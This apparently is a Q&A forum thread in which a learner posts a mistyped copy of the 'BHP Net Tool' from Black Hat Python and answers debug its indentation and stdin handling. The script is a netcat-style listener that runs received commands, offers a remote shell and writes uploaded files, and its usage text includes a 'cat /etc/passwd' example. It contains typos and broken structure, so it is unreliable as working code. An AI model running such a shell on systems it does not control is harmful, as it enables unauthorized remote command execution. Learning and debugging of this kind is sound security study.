Code from the Black Hat Python book not running?

Time: 2016-08-17 14:11:27

Tags: python command-line

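The code below is a script shown in the book Black Hat Python, but it doesn't seem to work. I'm reading an e-book, and after rewriting the code five times I still can't get it to work (the e-book doesn't allow copy/paste for some reason). I have tried the code and all of the examples shown in the book, but I get the same result: the line goes black for about a second and then it creates a normal command-line prompt ("C:\Python27") on the next line. I'm currently using Windows 10. In the book, the user entered "bhp.py -t localhost -p 9999" and it gave the user a custom command shell; that doesn't work for me... Thanks for looking at my question.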

import socket
import threading
import sys
import getopt
import subprocess

listen             = False
command            = False
upload             = False
execute            = ""
target             = ""
upload_destination = ""
port               = 0

def usage():
    print ("BHP Net Tool")
    print
    print ("USAGE: bhpnet.py -t target_host -p port")
    print ("-l --listen              - listen on [host]:[port] for incoming connections")
    print ("-e --execute=file_to_run - execute the given file upon receiving a connection")
    print ("-c --command             - initialize a command shell")
    print ("-u --upload=destination  - upon recieving connection upload a file and write to [destination]")
    print
    print
    print ("Examples: ")
    print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -c")
    print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -u=c:\\target.exe")
    print ("bhpnet.py -t 192.168.0.1 -p 5555 -1 -e=\"cat /etc/passwd\"")
    print ("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
    sys.exit(0)

def main():
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    try:
        opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu",     ["help","listen","execute","target","port","command","upload"])
    except getopt.GetoptError as err:
        print str(err)
        usage()

    for o,a in opts:
        if o in ("-h","--help"):
            usage()
        elif o in ("-l","--listen"):
            listen = True   
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--commandshell"):
            command = True
        elif o in ("-u", "--upload:"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)
        else:
            assert False, "Unhandled Option"

if not listen and len(target) and port > 0:
    buffer = sys.stfin.read()
    client_sender(buffer)

if listen:
    server_loop()
def client_sender(buffer):

    client = socket.socket(socket.AF_INET, socket.SOCK_STEAM)

    try:
        client.connect((target,port))

        if len(buffer):
            client.send(buffer)

        while True:
            recv_len = 1
            response = ""

            while recv_len:

                data     = client.recv(4096)
                recv_len = len(data)
                response+= data

                if recv_len < 4096:
                    break

            print response,

            buffer = raw_input("")
            buffer += "\n"

            client.send(buffer)

    except:

            print "[*] Exception! Exciting!."

            client.close()

def server_loop():
    global target

    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCL_STEAM)
    server.bind((target,port))
    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        client_thread = threading.Thread(target=client_handler,args=(client_socket,))
        client_thread.start()

def run_command(command):

    command = command.rstrip()

    try:
            output = subprocess.check_output(command,stderr=subprocess. STDOUT, shell=True)
    except:
            output = "Failed to execute command.\r\n"

    return output

def client_handler(client_socket):
    global upload
    global execute
    global command

    if len(upload_destination):

            file_buffer = ""
    while True:
        data = client_socket.recv(1024)

        if not data:
            break
        else:
            file_buffer += data

    try:
        file_descriptor = open(upload_destination,"wb")
        file_descriptor.write(file_buffer)
        file_descriptor.close()

        client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
    except:
        client_socket.send("Failed to save file to %s\r\n" % upload_destination)

if len(execute):

        output = run_command(execute)

        client_socket.send(output)

if command:

        while True:
            client_socket.send("<BHP:#> ")

            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)

            response = run_command(cmd_buffer)

            client_socket.send(response)

main()

3 answers:

Answer 0: (score: 0)

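I think your problem is that you have written the code that begins with the function def main() under the function def client_sender(buffer). However, as indicated in the book, you should write it above the function def main().

Give it a try.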

Answer 1: (score: 0)

You need to indent this block by 4 spaces:

if not listen and len(target) and port > 0:
    buffer = sys.stfin.read()
    client_sender(buffer)

if listen:
    server_loop()

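Then you have a typo: stfin should be stdin. After these changes, the command python script.py -t localhost -p 9999 starts the script and reaches the line buffer = sys.stdin.read(), but it does not print a prompt; is that correct? Otherwise it needs more fixes.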
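Why the unindented block makes the script return straight to the prompt, shown as an added example that is not part of the answer or the book: the two checks are reduced to a model with no networking, and `posted_layout`, `fixed_layout`, `parse` and `dispatch` are hypothetical names. Only the option spec and the two conditions are taken from the question's code.

```python
import getopt

# Option spec copied from the question's getopt.getopt() call.
SHORT = "hle:t:p:cu"
LONG = ["help", "listen", "execute", "target", "port", "command", "upload"]


def defaults():
    # Initial values of the script's globals.
    return {"listen": False, "target": "", "port": 0}


def parse(argv, state):
    """Option loop from main(), reduced to the three options the checks use."""
    opts, _ = getopt.getopt(argv, SHORT, LONG)
    for o, a in opts:
        if o in ("-l", "--listen"):
            state["listen"] = True
        elif o in ("-t", "--target"):
            state["target"] = a
        elif o in ("-p", "--port"):
            state["port"] = int(a)


def dispatch(state):
    """The two `if` checks; returns the name of the function they would call."""
    if not state["listen"] and len(state["target"]) and state["port"] > 0:
        return "client_sender"
    if state["listen"]:
        return "server_loop"
    return None


def posted_layout(argv):
    # Checks at module level: they run while the file is being loaded,
    # before the final main() call has parsed anything.
    state = defaults()
    action = dispatch(state)  # sees listen=False, target="", port=0
    parse(argv, state)        # main() then only updates the variables
    return action


def fixed_layout(argv):
    # Checks indented into main(), after the option loop.
    state = defaults()
    parse(argv, state)
    return dispatch(state)


if __name__ == "__main__":
    argv = ["-t", "localhost", "-p", "9999"]  # the command line from the question
    print("posted:", posted_layout(argv))
    print("fixed: ", fixed_layout(argv))
```

With the posted layout neither branch is taken and no exception is raised, which matches the symptom of the prompt coming back after about a second.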

Answer 2: (score: 0)

The problem was the keyboard language; in Spanish it is Control-Z and Enter.
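Why an end-of-file keystroke is needed at all, as an added example that is not part of the answer: `sys.stdin.read()` with no size argument returns only at end-of-file, so typing a full line and pressing Enter is not enough. The child one-liner and the function name `read_blocks_until_eof` are constructed for this demonstration; on a Windows console end-of-file is Ctrl-Z followed by Enter, on Unix terminals it is Ctrl-D.

```python
import subprocess
import sys

# Constructed child process standing in for the line
#     buffer = sys.stdin.read()
# It reports how much it read once read() finally returns.
CHILD = ("import sys; data = sys.stdin.read(); "
         "sys.stdout.write('read %d bytes' % len(data))")


def read_blocks_until_eof(text="hello\n", wait=1.0):
    """Send `text` without EOF, then send EOF.

    Returns (still_blocked_after_input, output_after_eof).
    """
    proc = subprocess.Popen([sys.executable, "-c", CHILD],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            universal_newlines=True)
    proc.stdin.write(text)
    proc.stdin.flush()
    try:
        # A complete line has been delivered, but stdin is still open.
        proc.wait(timeout=wait)
        blocked = False
    except subprocess.TimeoutExpired:
        # read() has not returned: it is still waiting for end-of-file.
        blocked = True
    # communicate() closes the child's stdin (EOF) and collects its output.
    output, _ = proc.communicate()
    return blocked, output


if __name__ == "__main__":
    blocked, output = read_blocks_until_eof()
    print("blocked after a full line:", blocked)
    print("after EOF:", output)
```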